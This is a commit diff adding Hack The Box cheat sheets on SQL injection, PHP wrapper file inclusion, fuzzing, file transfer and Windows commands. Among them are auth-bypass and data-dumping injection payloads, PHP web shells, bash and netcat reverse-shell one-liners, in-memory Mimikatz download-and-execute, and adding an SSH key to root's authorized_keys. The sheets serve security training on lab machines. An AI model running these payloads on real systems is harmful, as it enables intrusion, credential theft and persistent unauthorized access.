M README.md => README.md +1 -0
@@ 1,3 1,4 @@
Solutions to Hack The Box (HTB) machines
+- [cheatsheets](./cheatsheets)
- [gettingstarted.htb](./gettingstarted.htb/README.md)
A cheatsheets/Directory-Traversal.md => cheatsheets/Directory-Traversal.md +8 -0
@@ 0,0 1,8 @@
+| **Command** | **Description** |
+| --------------|-------------------|
+| `php://filter/read=convert.base64-encode/resource=/etc/passwd` | PHP filter to convert file contents to Base64 |
+| `php://filter/read=string.rot13/resource=/etc/passwd` | PHP filter to convert file contents to ROT13 |
+| `expect://id` | Command execution with PHP `Expect` wrapper |
+| `curl -s -X POST --data "<?php system('id'); ?>" "http://134.209.184.216:30084/index.php?language=php://input"` | Using PHP `Input` wrapper for command execution |
+| `zip://malicious.zip%23exec.php&cmd=id` | Command execution with the PHP `Zip` wrapper |
+| `<?php system($_GET['cmd']); ?>` | PHP web shell file contents (i.e., shell.php) |<
\ No newline at end of file
A cheatsheets/File-Transfer.md => cheatsheets/File-Transfer.md +13 -0
@@ 0,0 1,13 @@
+| **Command** | **Description** |
+| --------------|-------------------|
+| `Invoke-WebRequest https://<snip>/PowerView.ps1 -OutFile PowerView.ps1` | Download a file with PowerShell |
+| `IEX (New-Object Net.WebClient).DownloadString('https://<snip>/Invoke-Mimikatz.ps1')` | Execute a file in memory using PowerShell |
+| `Invoke-WebRequest -Uri http://10.10.10.32:443 -Method POST -Body $b64` | Upload a file with PowerShell |
+| `bitsadmin /transfer n http://10.10.10.32/nc.exe C:\Temp\nc.exe` | Download a file using Bitsadmin |
+| `certutil.exe -verifyctl -split -f http://10.10.10.32/nc.exe` | Download a file using Certutil |
+| `wget https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh -O /tmp/LinEnum.sh` | Download a file using Wget |
+| `curl -o /tmp/LinEnum.sh https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh` | Download a file using cURL |
+| `php -r '$file = file_get_contents("https://<snip>/LinEnum.sh"); file_put_contents("LinEnum.sh",$file);'` | Download a file using PHP |
+| `scp C:\Temp\bloodhound.zip user@10.10.10.150:/tmp/bloodhound.zip` | Upload a file using SCP |
+| `scp user@target:/tmp/mimikatz.exe C:\Temp\mimikatz.exe` | Download a file using SCP |
+| `Invoke-WebRequest http://nc.exe -UserAgent [Microsoft.PowerShell.Commands.PSUserAgent]::Chrome -OutFile "nc.exe"` | Invoke-WebRequest using a Chrome User Agent |<
\ No newline at end of file
A cheatsheets/SQL_Injections.md => cheatsheets/SQL_Injections.md +69 -0
@@ 0,0 1,69 @@
+## MySQL
+
+| **Command** | **Description** |
+| --------------|-------------------|
+| **General** |
+| `mysql -u root -h docker.hackthebox.eu -P 3306 -p` | login to mysql database |
+| `SHOW DATABASES` | List available databases |
+| `USE users` | Switch to database |
+| **Tables** |
+| `CREATE TABLE logins (id INT, ...)` | Add a new table |
+| `SHOW TABLES` | List available tables in current database |
+| `DESCRIBE logins` | Show table properties and columns |
+| `INSERT INTO table_name VALUES (value_1,..)` | Add values to table |
+| `INSERT INTO table_name(column2, ...) VALUES (column2_value, ..)` | Add values to specific columns in a table |
+| `UPDATE table_name SET column1=newvalue1, ... WHERE <condition>` | Update table values |
+| **Columns** |
+| `SELECT * FROM table_name` | Show all columns in a table |
+| `SELECT column1, column2 FROM table_name` | Show specific columns in a table |
+| `DROP TABLE logins` | Delete a table |
+| `ALTER TABLE logins ADD newColumn INT` | Add new column |
+| `ALTER TABLE logins RENAME COLUMN newColumn TO oldColumn` | Rename column |
+| `ALTER TABLE logins MODIFY oldColumn DATE` | Change column datatype |
+| `ALTER TABLE logins DROP oldColumn` | Delete column |
+| **Output** |
+| `SELECT * FROM logins ORDER BY column_1` | Sort by column |
+| `SELECT * FROM logins ORDER BY column_1 DESC` | Sort by column in descending order |
+| `SELECT * FROM logins ORDER BY column_1 DESC, id ASC` | Sort by two-columns |
+| `SELECT * FROM logins LIMIT 2` | Only show first two results |
+| `SELECT * FROM logins LIMIT 1, 2` | Only show first two results starting from index 2 |
+| `SELECT * FROM table_name WHERE <condition>` | List results that meet a condition |
+| `SELECT * FROM logins WHERE username LIKE 'admin%'` | List results where the name is similar to a given string |
+
+## MySQL Operator Precedence
+* Division (`/`), Multiplication (`*`), and Modulus (`%`)
+* Addition (`+`) and Subtraction (`-`)
+* Comparison (`=`, `>`, `<`, `<=`, `>=`, `!=`, `LIKE`)
+* NOT (`!`)
+* AND (`&&`)
+* OR (`||`)
+
+## SQL Injection
+| **Payload** | **Description** |
+| --------------|-------------------|
+| **Auth Bypass** |
+| `admin' or '1'='1` | Basic Auth Bypass |
+| `admin')-- -` | Basic Auth Bypass With comments |
+| [Auth Bypass Payloads](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/SQL%20Injection#authentication-bypass) |
+| **Union Injection** |
+| `' order by 1-- -` | Detect number of columns using `order by` |
+| `cn' UNION select 1,2,3-- -` | Detect number of columns using Union injection |
+| `cn' UNION select 1,@@version,3,4-- -` | Basic Union injection |
+| `UNION select username, 2, 3, 4 from passwords-- -` | Union injection for 4 columns |
+| **DB Enumeration** |
+| `SELECT @@version` | Fingerprint MySQL with query output |
+| `SELECT SLEEP(5)` | Fingerprint MySQL with no output |
+| `cn' UNION select 1,database(),2,3-- -` | Current database name |
+| `cn' UNION select 1,schema_name,3,4 from INFORMATION_SCHEMA.SCHEMATA-- -` | List all databases |
+| `cn' UNION select 1,TABLE_NAME,TABLE_SCHEMA,4 from INFORMATION_SCHEMA.TABLES where table_schema='dev'-- -` | List all tables in a specific database |
+| `cn' UNION select 1,COLUMN_NAME,TABLE_NAME,TABLE_SCHEMA from INFORMATION_SCHEMA.COLUMNS where table_name='credentials'-- -` | List all columns in a specific table |
+| `cn' UNION select 1, username, password, 4 from dev.credentials-- -` | Dump data from a table in another database |
+| **Privileges** |
+| `cn' UNION SELECT 1, user(), 3, 4-- -` | Find current user |
+| `cn' UNION SELECT 1, super_priv, 3, 4 FROM mysql.user WHERE user="root"-- -` | Find if user has admin privileges |
+| `cn' UNION SELECT 1, grantee, privilege_type, is_grantable FROM information_schema.user_privileges WHERE user="root"-- -` | Find if all user privileges |
+| `cn' UNION SELECT 1, variable_name, variable_value, 4 FROM information_schema.global_variables where variable_name="secure_file_priv"-- -` | Find which directories can be accessed through MySQL |
+| **File Injection** |
+| `cn' UNION SELECT 1, LOAD_FILE("/etc/passwd"), 3, 4-- -` | Read local file |
+| `select 'file written successfully!' into outfile '/var/www/html/proof.txt'` | Write a string to a local file |
+| `cn' union select "",'<?php system($_REQUEST[0]); ?>', "", "" into outfile '/var/www/html/shell.php'-- -` | Write a web shell into the base web directory |<
\ No newline at end of file
A cheatsheets/ffuf.md => cheatsheets/ffuf.md +31 -0
@@ 0,0 1,31 @@
+# Ffuf
+
+| **Command** | **Description** |
+| --------------|-------------------|
+| `ffuf -h` | ffuf help |
+| `ffuf -w wordlist.txt:FUZZ -u http://SERVER_IP:PORT/FUZZ` | Directory Fuzzing |
+| `ffuf -w wordlist.txt:FUZZ -u http://SERVER_IP:PORT/indexFUZZ` | Extension Fuzzing |
+| `ffuf -w wordlist.txt:FUZZ -u http://SERVER_IP:PORT/blog/FUZZ.php` | Page Fuzzing |
+| `ffuf -w wordlist.txt:FUZZ -u http://SERVER_IP:PORT/FUZZ -recursion -recursion-depth 1 -e .php -v` | Recursive Fuzzing |
+| `ffuf -w wordlist.txt:FUZZ -u https://FUZZ.hackthebox.eu/` | Sub-domain Fuzzing |
+| `ffuf -w wordlist.txt:FUZZ -u http://academy.htb:PORT/ -H 'Host: FUZZ.academy.htb' -fs xxx` | VHost Fuzzing |
+| `ffuf -w wordlist.txt:FUZZ -u http://admin.academy.htb:PORT/admin/admin.php?FUZZ=key -fs xxx` | Parameter Fuzzing - GET |
+| `ffuf -w wordlist.txt:FUZZ -u http://admin.academy.htb:PORT/admin/admin.php -X POST -d 'FUZZ=key' -H 'Content-Type: application/x-www-form-urlencoded' -fs xxx` | Parameter Fuzzing - POST |
+| `ffuf -w ids.txt:FUZZ -u http://admin.academy.htb:PORT/admin/admin.php -X POST -d 'id=FUZZ' -H 'Content-Type: application/x-www-form-urlencoded' -fs xxx` | Value Fuzzing |
+
+# Wordlists
+
+| **Command** | **Description** |
+| --------------|-------------------|
+| `/opt/useful/SecLists/Discovery/Web-Content/directory-list-2.3-small.txt` | Directory/Page Wordlist |
+| `/opt/useful/SecLists/Discovery/Web-Content/web-extensions.txt` | Extensions Wordlist |
+| `/opt/useful/SecLists/Discovery/DNS/subdomains-top1million-5000.txt` | Domain Wordlist |
+| `/opt/useful/SecLists/Discovery/Web-Content/burp-parameter-names.txt` | Parameters Wordlist |
+
+# Misc
+
+| **Command** | **Description** |
+| --------------|-------------------|
+| `sudo sh -c 'echo "SERVER_IP academy.htb" >> /etc/hosts'` | Add DNS entry |
+| `for i in $(seq 1 1000); do echo $i >> ids.txt; done` | Create Sequence Wordlist |
+| `curl http://admin.academy.htb:PORT/admin/admin.php -X POST -d 'id=key' -H 'Content-Type: application/x-www-form-urlencoded'` | curl w/ POST |<
\ No newline at end of file
A cheatsheets/getting-started.md => cheatsheets/getting-started.md +89 -0
@@ 0,0 1,89 @@
+## Basic Tools
+
+| **Command** | **Description** |
+| --------------|-------------------|
+| **General** |
+| `sudo openvpn user.ovpn` | Connect to VPN |
+| `ifconfig`/`ip a` | Show our IP address |
+| `netstat -rn` | Show networks accessible via the VPN |
+| `ssh user@10.10.10.10` | SSH to a remote server |
+| `ftp 10.129.42.253` | FTP to a remote server |
+| **tmux** |
+| `tmux` | Start tmux |
+| `ctrl+b ctrl+c` | tmux: new window |
+| `ctrl+b 1` | tmux: switch to window (`1`) |
+| `ctrl+%` | tmux: split pane vertically |
+| `ctrl+"` | tmux: split pane horizontally |
+| `ctrl+->` | tmux: switch to the right pane |
+| **Vim** |
+| `vim file` | vim: open `file` with vim |
+| `esc+i` | vim: enter `insert` mode |
+| `esc` | vim: back to `normal` mode |
+| `x` | vim: Cut character |
+| `dw` | vim: Cut word |
+| `dd` | vim: Cut full line |
+| `yw` | vim: Copy word |
+| `yy` | vim: Copy full line |
+| `p` | vim: Paste |
+| `:1` | vim: Go to line number 1. |
+| `:w` | vim: Write the file 'i.e. save' |
+| `:q` | vim: Quit |
+| `:q!` | vim: Quit without saving |
+| `:wq` | vim: Write and quit |
+
+## Pentesting
+| **Command** | **Description** |
+| --------------|-------------------|
+| **Service Scanning** |
+| `nmap 10.129.42.253` | Run nmap on an IP |
+| `nmap -sV -sC -p- 10.129.42.253` | Run an nmap script scan on an IP |
+| `locate scripts/citrix` | List various available nmap scripts |
+| `nmap --script smb-os-discovery.nse -p445 10.10.10.40` | Run an nmap script on an IP |
+| `netcat 10.10.10.10 22` | Grab banner of an open port |
+| `smbclient -N -L \\\\10.129.42.253` | List SMB Shares |
+| `smbclient \\\\10.129.42.253\\users` | Connect to an SMB share |
+| `snmpwalk -v 2c -c public 10.129.42.253 1.3.6.1.2.1.1.5.0` | Scan SNMP on an IP |
+| `onesixtyone -c dict.txt 10.129.42.254` | Brute force SNMP secret string |
+| **Web Enumeration** |
+| `gobuster dir -u http://10.10.10.121/ -w /usr/share/dirb/wordlists/common.txt` | Run a directory scan on a website |
+| `gobuster dns -d inlanefreight.com -w /usr/share/SecLists/Discovery/DNS/namelist.txt` | Run a sub-domain scan on a website |
+| `curl -IL https://www.inlanefreight.com` | Grab website banner |
+| `whatweb 10.10.10.121` | List details about the webserver/certificates |
+| `curl 10.10.10.121/robots.txt` | List potential directories in `robots.txt` |
+| `ctrl+U` | View page source (in Firefox) |
+| **Public Exploits** |
+| `searchsploit openssh 7.2` | Search for public exploits for a web application |
+| `msfconsole` | MSF: Start the Metasploit Framework |
+| `search exploit eternalblue` | MSF: Search for public exploits in MSF |
+| `use exploit/windows/smb/ms17_010_psexec` | MSF: Start using an MSF module |
+| `show options` | MSF: Show required options for an MSF module |
+| `set RHOSTS 10.10.10.40` | MSF: Set a value for an MSF module option |
+| `check` | MSF: Test if the target server is vulnerable |
+| `exploit` | MSF: Run the exploit on the target server is vulnerable |
+| **Using Shells** |
+| `nc -lvnp 1234` | Start a `nc` listener on a local port |
+| `bash -c 'bash -i >& /dev/tcp/10.10.10.10/1234 0>&1'` | Send a reverse shell from the remote server |
+| `rm /tmp/f;mkfifo /tmp/f;cat /tmp/f\|/bin/sh -i 2>&1\|nc 10.10.10.10 1234 >/tmp/f` | Another command to send a reverse shell from the remote server |
+| `rm /tmp/f;mkfifo /tmp/f;cat /tmp/f\|/bin/bash -i 2>&1\|nc -lvp 1234 >/tmp/f` | Start a bind shell on the remote server |
+| `nc 10.10.10.1 1234` | Connect to a bind shell started on the remote server |
+| `python -c 'import pty; pty.spawn("/bin/bash")'` | Upgrade shell TTY (1) |
+| `ctrl+z` then `stty raw -echo` then `fg` then `enter` twice | Upgrade shell TTY (2) |
+| `echo "<?php system(\$_GET['cmd']);?>" > /var/www/html/shell.php` | Create a webshell php file |
+| `curl http://SERVER_IP:PORT/shell.php?cmd=id` | Execute a command on an uploaded webshell |
+| **Privilege Escalation** |
+| `./linpeas.sh` | Run `linpeas` script to enumerate remote server |
+| `sudo -l` | List available `sudo` privileges |
+| `sudo -u user /bin/echo Hello World!` | Run a command with `sudo` |
+| `sudo su -` | Switch to root user (if we have access to `sudo su`) |
+| `sudo su user -` | Switch to a user (if we have access to `sudo su`) |
+| `ssh-keygen -f key` | Create a new SSH key |
+| `echo "ssh-rsa AAAAB...SNIP...M= user@parrot" >> /root/.ssh/authorized_keys` | Add the generated public key to the user |
+| `ssh root@10.10.10.10 -i key` | SSH to the server with the generated private key |
+| **Transferring Files** |
+| `python3 -m http.server 8000` | Start a local webserver |
+| `wget http://10.10.14.1:8000/linpeas.sh` | Download a file on the remote server from our local machine |
+| `curl http://10.10.14.1:8000/linenum.sh -o linenum.sh` | Download a file on the remote server from our local machine |
+| `scp linenum.sh user@remotehost:/tmp/linenum.sh` | Transfer a file to the remote server with `scp` (requires SSH access) |
+| `base64 shell -w 0` | Convert a file to `base64` |
+| `echo f0VMR...SNIO...InmDwU \| base64 -d > shell` | Convert a file from `base64` back to its orig |
+| `md5sum shell` | Check the file's `md5sum` to ensure it converted correctly |<
\ No newline at end of file
A cheatsheets/windows.md => cheatsheets/windows.md +23 -0
@@ 0,0 1,23 @@
+| **Command** | **Description** |
+| --------------|-------------------|
+| `xfreerdp /v:<target IP address> /u:htb-student /p:<password>` | RDP to lab target |
+| `Get-WmiObject -Class win32_OperatingSystem` | Get information about the operating system |
+| `dir c:\ /a` | View all files and directories in the c:\ root directory |
+| `tree <directory>` | Graphically displaying the directory structure of a path |
+| `tree c:\ /f \| more` | Walk through results of the `tree` command page by page |
+| `icacls <directory>` | View the permissions set on a directory |
+| `icacls c:\users /grant joe:f` | Grant a user full permissions to a directory |
+| `icacls c:\users /remove joe` | Remove a users' permissions on a directory |
+| `Get-Service` | `PowerShell` cmdlet to view running services |
+| `help <command>` | Display the help menu for a specific command |
+| `get-alias` | List `PowerShell` aliases |
+| `New-Alias -Name "Show-Files" Get-ChildItem` | Create a new `PowerShell` alias |
+| `Get-Module \| select Name,ExportedCommands \| fl` | View imported `PowerShell` modules and their associated commands |
+| `Get-ExecutionPolicy -List` | View the `PowerShell` execution policy |
+| `Set-ExecutionPolicy Bypass -Scope Process` | Set the `PowerShell` execution policy to bypass for the current session |
+| `wmic os list brief` | Get information about the operating system with `wmic` |
+| `Invoke-WmiMethod` | Call methods of `WMI` objects |
+| `whoami /user` | View the current users' SID |
+| `reg query <key>` | View information about a registry key |
+| `Get-MpComputerStatus` | Check which `Defender` protection settings are enabled |
+| `sconfig` | Load Server Configuration menu in Windows Server Core |<
\ No newline at end of file